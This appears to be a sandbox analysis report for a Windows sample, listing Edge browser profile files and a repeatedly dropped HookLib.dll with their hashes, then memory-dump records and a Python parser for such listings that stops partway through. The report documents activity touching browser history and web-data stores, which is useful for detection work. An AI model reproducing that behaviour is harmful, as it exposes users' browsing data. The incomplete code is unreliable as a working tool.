SHA18026c8e4736507c24be591363ac663f7baf9f483
SHA2561941c231db5a23698348e22926d927f5392ce3664e816ec346eda704b8941e63
SHA5120c80b39a8ff68d0a4e812151e42903a68ec2fc70c1af04f2567cbcbefdc74ddf453c3249d325e3be08d6dd089bcba3802e9fd866c843fd6bd8c7fc316d5d7f4c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\FaviconsFilesize
20KB
MD56170970548a919117305b50b3cb6671c
SHA13f457d652f1fe6da834f6db66597f40de08e30d2
SHA256b8eaa7e063758bb27118f5a38a8f4d4c89b88ab446317d74752902fb9a8c800f
SHA5127b4f557b37bc6089915b775412796c6839b145899de7321b4d4ddb011f2aceb1faaf839796b6c1b8ffa921f9627276b326d349ac55c203467a64f6539176a6df
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0Filesize
8KB
MD5cf89d16bb9107c631daabf0c0ee58efb
SHA13ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA5128cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1Filesize
264KB
MD51771a3f6a54e1f1f91c5fd90df0f76e1
SHA1611070f8fff13f6bb55c85eee8645b09fe01caa4
SHA25628e9bcf1d044ed602396c1017825ca6416656e87985368515d30b86e0973378f
SHA512e7aa9103806151537d4dbd6bb88720e95016bb7286d6a28c8458e9f065f811c0ffd63c1198b12d13c214410a113b97062b68d7611c61620bdb227df6acdee7f1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3Filesize
8KB
MD541876349cb12d6db992f1309f22df3f0
SHA15cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\indexFilesize
256KB
MD538dfa8ed69ba0a9487da5cc66c4974d7
SHA190272ec22b96b6f5c5beb9963b7538bf59484e50
SHA25620a9c3fd4d8189a0829bef6872cc4506db952fadfcb5505cf0ecb50c1225efb1
SHA5126b3157e57571b36c39272650c702fc616aed0f07688be31f344ab948f293d9e2329992d1c753a1199fc3d45afde79f879c426d8c41aa18c7ba33c6741607c7c6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD5dc3bd06f5a6790e667b647007f6ad72f
SHA1220e8390ff60e6461feca96dfd8c62eec7b2b87b
SHA256af82555fdf14c4ea58e08563f298f3edfdff2bdc23e98b5d56cf1050abeb62df
SHA512bdfa5586b2799b28f2afd6ba3b3329756c9a75704d664c3718c1b36cb6159d54d69db4eeec008c0f2f15bf9a39814817317940db4c71e2af9afd0618bef9eba0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider CacheFilesize
6B
MD5a9851aa4c3c8af2d1bd8834201b2ba51
SHA1fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA51241a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logFilesize
8KB
MD50b78d42178eb97158b347ac11f37cfaf
SHA1b60b5be28ea33748ae021e0f44b187baaf731345
SHA256b213716767522e2c5510c82d8d8689706c37a146478134a137b368b1c28fb449
SHA512b73b862e23d137383d53919da9e5095696aa19812e9bf4f904211b8290330247c984acc5b6d4ba0b065ad0c08ab04eac7f076fe3b023a8c4e8fac390757ebc35
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
331B
MD5edbfb8a564f22688c67d7ff0bdd47a8d
SHA1edafacad98ebca8745a9288e5507eecdec458ba9
SHA256433b035ae022c4a81cffb35f64e3ea5fec5bb4c4ec7d0753d88196b358e2de85
SHA512f7124f4f8925fc0ff1308064a9aa31b88358908d4e9a767a61b34f0292b4261905a79f979fad8f3a6c95a9ead21c8321aa1ec9cfcacc70de22d759e94e6d1888
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5efdddcfed87937127a8d4987099ec052
SHA11378a1901665d5b7d56fa725a1bdc26b368b7706
SHA256754fab0b90814e80acf7b8d82520c563f5a71c4d040e3c75be4aed409e577a14
SHA5120592563a65bdbb4cc702b54c2c90e0b8b558199028f798d0a0848e508ac6b97a837eb5455176798c87ee73397b7402bf3d931bb526969e5cde55e772ea227fd3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5545b8a4d34e0b066e4a604a6485a7f6d
SHA199124e047bd140bd87bd5482df332ef9282db2f7
SHA2564628e41d29bd61e5ce892f444ad5dc0b291040c8539e077a4549db88df94b6e5
SHA512cfabe12c401694fd8117f587b74cba9225f3e3ceee02b5a17642051d8b52abec0b85aeef9665b01f1cdda447d296de8c4c55394dc102111c0d24d7b15d541d16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD5d6f03946d756e115f6273b19bac0379e
SHA186e990d53d81966281788dfaf2f994fd1adff785
SHA256c4dace714e72baf9419c339fc2f217b04ea8cee98cf5e470aed86e5ebd6a5b35
SHA512725e8aa05db851bfe91c2d0f89233ac88f28a0da110ef676942bca5d3a0048ba420dbd4bda485a7cea387e17b37d603a9e5e2d98074854fb272196dd42484e70
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.logFilesize
812B
MD5a3926ea440b809cee219387189262158
SHA1edaa5b44f2acb3777f74fdbf39e365ba7fd4974f
SHA256fcfe8c31337371ec518bfe82518c04731c1defafd69350fa6f4dfe72165299d7
SHA5125a204010f027b865c21100cf6fe6e7b047440a0c58d8397515cb929467224897c1d16dfafcfd661de972b37768304baf89374d796d0a25c191e9dfd0b448b4bd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOGFilesize
297B
MD5707fb1a22b3e1cf389cf412ec645cb48
SHA18c28cbe3a0bca369bda10b906275776c91d6b27f
SHA2564548c348f492097ee8f6035997f9b14960a6b357fec44d77ad42d01537cf8d7c
SHA512ea761619e2f3d79e28beff24bf19ed714f794215ae6fa4c16364255d19bb9a085d426a9fac1996b9881dc9ad1e2c7ef50f07a686b945fc95c2392c77bc43aedf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.logFilesize
112B
MD536d7667fb88565281461f00fbb8a61a7
SHA1a0dbbce1e7c158c9be15409a4770cc8b16d9156a
SHA256f8d53ca6783cefd2bc3d5da2f745974d0a2e571d945ec233713d7213c7213162
SHA5128f23d5e34ca1cd101e8495c7bb6dafb01013aa6b9c4f6dc04f992dece91dfdf50703de07e91bfd61428bc1a335f5f9e38b38a55f5cbeadce68a8c81bea1f5f06
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
347B
MD53c22f1fbc63819a62ab4e330aa71c9b9
SHA1edf1981510f535b7c46fdcd9b690eed60a841436
SHA256cf9433058ae4d930446ada73dddcd5af098a2b2c81258c94e955b993fff4a0e3
SHA512060c971981854f7bd6aa5ee0329c5c7f176c64147447328c11b931f235879849c4a62c15ec619443a2b8c48d711d8b3fab40e71babacf7dded5898563c226b78
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
323B
MD5ce3f7488f1269ca390fa81be023f6747
SHA1f61d673e9809c5643b3dfa2d4c3c824ff43f6ad2
SHA256fde1290f4d0085e90d2fb24e7e76ac39a8c0d9c52426e005e2435bd3779337ed
SHA512: 90aa35432de8a3369c6f0b1f1829770ffb913436bf261932337d650ac0147a0176e00460e0f8611f081093950ab77451c0c869fa5c557e43bf379a05f795107b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites
Filesize: 20KB
MD5: f44dc73f9788d3313e3e25140002587c
SHA1: 5aec4edc356bc673cba64ff31148b934a41d44c4
SHA256: 2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983
SHA512: e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
Filesize: 128KB
MD5: d9c29ceb260b45ca053e1e6bea017931
SHA1: a91172b331ea95fea92213844719b56ae1f7bb5d
SHA256: 1bfbde06adb2893e3879152f5a37c1021a3bfb1ae1a7f32428b673ebc70213f3
SHA512: 652ac0ca99b401d8f2a4786d22adbb1e0d64a614c978cf2c1133be2a6a5adf676bb68fbfe1cc01648875103cdbf4cb3bc4dd671eaab5b732ac4812db9e70f65b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
Filesize: 116KB
MD5: f70aa3fa04f0536280f872ad17973c3d
SHA1: 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256: 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512: 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
Filesize: 52KB
MD5: 3d272de11b92ba7619986c4e4353ac9b
SHA1: c4cbab5c2d1e838f230dffaf6335c60883abfafd
SHA256: bbf744d4039bc22efab1b23444bb87053fb7021783bbf688bf2f89d7b862dcf8
SHA512: d133e52f8d71035800c3f1d4409f11ada4662699901ac1bb49d6a9e480f7e55388785510479d0238fc43da7ce602d46cfedba90e1d68b1903f1608c81a7bf6bc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize: 297B
MD5: 5c45b171a72a6a18c672eb01fd28a5c8
SHA1: de4fafbcda096558e3428e80cfba2e1a77b7d790
SHA256: 5415ad19cfc78fa3a43b05ac12dbe454f859843b634c66d6c9f5af29b7a97bfb
SHA512: 2986d2ffaecd1d769a29c624c330a8c3b83a0a36b09b187d7159984fd91467145845eaf11602dc76c05252b13ebe4bf74631a7af2870305083446acf5417dbf7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize: 264KB
MD5: b88cfd3c9d99884ed0a6a4f3a7d404bf
SHA1: deff07f3834b246b6db4cc85f8c0691e3209ec24
SHA256: 265df437e2aebb96078819cb8a9bec86c31ae530d981bb4bbce796f2b634ab16
SHA512: 1f5c85f1547762556f798f7377f8cc456722822e010ed9ae490feff95eccb0981f2f3dcae5d0b3083bffe107f91f9bff424e9007367e106bf9a5c214508e5f75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize: 11B
MD5: 838a7b32aefb618130392bc7d006aa2e
SHA1: 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256: ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512: 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize: 13KB
MD5: 651be1f5625542914f87b9d702fffcc1
SHA1: 53fd658219aa5883184d1ab75a994c2e5a1e3ea2
SHA256: f43c64561d9c36e1603cda4fee1010253aae260e6c0e7cf3d1207285e0ae3306
SHA512: 1cfbe6f73e1d3d6290e51219e5ecf851ba94dc7137e79d34cbc2aaff993696b6155aa9c69baa745bfb26f7af2c4eaa76aba6a27e9b2d8011fc8328657929d6f4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
Filesize: 264KB
MD5: 767890cc470174b513308e9e648d36d2
SHA1: ab6765e638baaad7a74d98fb5510c8db2db771b2
SHA256: 727b57fe7039b522c7415b24e99631470b267e42236eb048372dde7c5b5e10c9
SHA512: 53beb1edd38141d88dc2dbedad63480953cf47cd423bbc38eb6095c7c2f2c539f946ee5d568d57cd4cc64ab3f648c2c7b410eab8529cfc484068be1b2a207405
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
Filesize: 81B
MD5: f222079e71469c4d129b335b7c91355e
SHA1: 0056c3003874efef229a5875742559c8c59887dc
SHA256: e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00
SHA512: e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
Filesize: 126KB
MD5: 6698422bea0359f6d385a4d059c47301
SHA1: b1107d1f8cc1ef600531ed87cea1c41b7be474f6
SHA256: 2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
SHA512: d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
Filesize: 40B
MD5: 96aa8b0db9bd3589576676d4dab632ca
SHA1: ebbcc44a394ac6cbe618e5d7a22e14a964d086ef
SHA256: 2d01dd11aa5bd4e52e60d78726482c633a22e61fe72e9689dea1a383c3694da7
SHA512: 6af3643ddcc85c8f244e39f1aeffa6e59c7a7901650701bdc32a3e7845c58f947df9b7a8f1f9510cc5534c8a079228c2cc1a6fd8ea6d6bf3fe77ef591d30ed0c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637983256491019922
Filesize: 4KB
MD5: a5f9cd2afcd31cfe11e3f584ebe3a4be
SHA1: 67a8bf5673c6459bf07d6c6b9ce79c3aa2ce491a
SHA256: d92eb95e8e50deb7b0e7f470b25b00d572760f7b39b8ad42d76013c80224b4ee
SHA512: e9568bce46f4ff0c6b81be1da7726e9a5c6d9544b857d9e806016affd1e234a942bb0860e04f84aa42b0f81a632018d42931929b2e0b63401484337028a4f5f2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
Filesize: 29B
MD5: ce545b52b20b2f56ffb26d2ca2ed4491
SHA1: ebe904c20bb43891db4560f458e66663826aa885
SHA256: e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899
SHA512: 1ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684
Filesize: 450KB
MD5: a7aab197b91381bcdec092e1910a3d62
SHA1: 35794f2d2df163223391a2b21e1610f14f46a78f
SHA256: 6337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b
SHA512: cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774
-
C:\Users\Admin\AppData\Local\Temp\HookLib.dll (this entry appears five times in the report, with identical size and digests each time)
Filesize: 46KB
MD5: 98f49c27634711f0af5e9535b13179f5
SHA1: 4267af836b75278f22724a6864525efd60597781
SHA256: 9afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
SHA512: 409fce493aa7bbe6bcc8d7e972fbe3e0da13fda86c6e14bdaf1c3b0e43ee0ab6c4c1ccd4efcb213681e3f54bd7658569647e08451aa5bd1daaba7f692ba427ad
-
\??\pipe\LOCAL\crashpad_2104_XQIFEABJVWLYZSPO (no size recorded; the digests below are those of zero-length input, so the pipe had no readable content when the sandbox hashed it)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_5112_CKKZDEACZPNRXBEM (no size recorded; same zero-length-input digests as above)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/8-182-0x0000000000000000-mapping.dmp
memory/32-198-0x0000000000000000-mapping.dmp
memory/424-300-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/560-155-0x0000000000000000-mapping.dmp
memory/732-190-0x0000000000000000-mapping.dmp
memory/852-157-0x0000000000000000-mapping.dmp
memory/896-216-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/1072-200-0x0000000000000000-mapping.dmp
memory/1112-203-0x0000000000000000-mapping.dmp
memory/1116-150-0x0000000000000000-mapping.dmp
memory/1120-179-0x0000000000000000-mapping.dmp
memory/1244-165-0x0000000000000000-mapping.dmp
memory/1256-184-0x0000000000000000-mapping.dmp
memory/1276-159-0x0000000000000000-mapping.dmp
memory/1304-322-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/1304-316-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/1304-328-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-321-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/1304-337-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-325-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-329-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/1304-324-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-323-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-334-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/1304-315-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-317-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-318-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1304-319-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/1416-180-0x0000000000000000-mapping.dmp
memory/1420-205-0x0000000000000000-mapping.dmp
memory/1428-193-0x0000000000000000-mapping.dmp
memory/1676-174-0x0000000000000000-mapping.dmp
memory/1776-197-0x0000000000000000-mapping.dmp
memory/1820-167-0x0000000000000000-mapping.dmp
memory/1860-144-0x0000000000000000-mapping.dmp
memory/1872-204-0x0000000000000000-mapping.dmp
memory/1872-149-0x0000000000000000-mapping.dmp
memory/1948-170-0x0000000000000000-mapping.dmp
memory/1992-166-0x0000000000000000-mapping.dmp
memory/2040-177-0x0000000000000000-mapping.dmp
memory/2076-196-0x0000000000000000-mapping.dmp
memory/2104-153-0x0000000000000000-mapping.dmp
memory/2280-188-0x0000000000000000-mapping.dmp
memory/2288-175-0x0000000000000000-mapping.dmp
memory/2328-158-0x0000000000000000-mapping.dmp
memory/2344-160-0x0000000000000000-mapping.dmp
memory/2376-195-0x0000000000000000-mapping.dmp
memory/2392-185-0x0000000000000000-mapping.dmp
memory/2440-154-0x0000000000000000-mapping.dmp
memory/2444-199-0x0000000000000000-mapping.dmp
memory/2452-183-0x0000000000000000-mapping.dmp
memory/2508-161-0x0000000000000000-mapping.dmp
memory/2760-171-0x0000000000000000-mapping.dmp
memory/2768-173-0x0000000000000000-mapping.dmp
memory/2864-218-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-143-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-139-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/2864-140-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/2864-141-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-142-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-134-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-132-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-136-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-207-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-133-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/2864-219-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/2864-135-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/2864-208-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/2908-206-0x0000000000000000-mapping.dmp
memory/2984-178-0x0000000000000000-mapping.dmp
memory/3164-168-0x0000000000000000-mapping.dmp
memory/3200-210-0x0000000000000000-mapping.dmp
memory/3280-186-0x0000000000000000-mapping.dmp
memory/3288-194-0x0000000000000000-mapping.dmp
memory/3460-164-0x0000000000000000-mapping.dmp
memory/3568-181-0x0000000000000000-mapping.dmp
memory/3664-163-0x0000000000000000-mapping.dmp
memory/3760-172-0x0000000000000000-mapping.dmp
memory/3808-176-0x0000000000000000-mapping.dmp
memory/4252-332-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/4288-148-0x0000000000000000-mapping.dmp
memory/4336-285-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-297-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-290-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/4336-289-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp (Filesize: 64KB)
memory/4336-291-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-292-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-293-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-296-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-287-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-286-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-304-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-305-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/4336-283-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmp (Filesize: 15.1MB)
memory/4336-284-0x00007FFC0A2F0000-0x00007FFC0A4E5000-memory.dmp (Filesize: 2.0MB)
memory/4364-151-0x0000000000000000-mapping.dmp
memory/4388-169-0x0000000000000000-mapping.dmp
memory/4460-189-0x0000000000000000-mapping.dmp
memory/4504-201-0x0000000000000000-mapping.dmp
memory/4540-156-0x0000000000000000-mapping.dmp
memory/4556-209-0x0000000000000000-mapping.dmp
memory/4560-202-0x0000000000000000-mapping.dmp
memory/4796-187-0x0000000000000000-mapping.dmp
memory/4812-191-0x0000000000000000-mapping.dmp
memory/4868-152-0x0000000000000000-mapping.dmp
memory/4988-192-0x0000000000000000-mapping.dmp
memory/5032-146-0x0000000000000000-mapping.dmp
memory/5076-211-0x0000000000000000-mapping.dmp
memory/5104-162-0x0000000000000000-mapping.dmp
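The dropped-file and memory-dump inventory above is what an analyst usually gets from a sandbox export: one record per drop, the label glued to its value, the same file listed once per write, and one dump per captured region. The following Python is an added example, not part of this report or of any sandbox's own tooling. It parses that flattened form, collapses repeated drops of identical content by SHA-256, flags entries whose digests are the well-known hashes of zero-length input, and groups memory dumps by address range so that a range dumped from several PIDs stands out. The sample input is a constructed subset of the listing above; the function names are this example's own.

```python
import re
from collections import defaultdict

# Digests of zero-length input: an entry carrying these had no readable content.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")
MEMORY_NAME = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-(?:0x(?P<end>[0-9A-Fa-f]+)-memory|mapping)\.dmp$")

# Constructed sample: a subset of the report's listing in its raw flattened form.
SAMPLE = """\
C:\\Users\\Admin\\AppData\\Local\\Temp\\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\HookLib.dllFilesize
46KB
MD598f49c27634711f0af5e9535b13179f5
SHA2569afef3e87b1ab5973d002444f9c76edc2b4cee1e3441eaec539673c412b7fe16
-
\\??\\pipe\\LOCAL\\crashpad_2104_XQIFEABJVWLYZSPOMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-
memory/2864-137-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmpFilesize
15.1MB
-
memory/4336-288-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmpFilesize
15.1MB
-
memory/1304-320-0x00007FF7F49D0000-0x00007FF7F58F4000-memory.dmpFilesize
15.1MB
-
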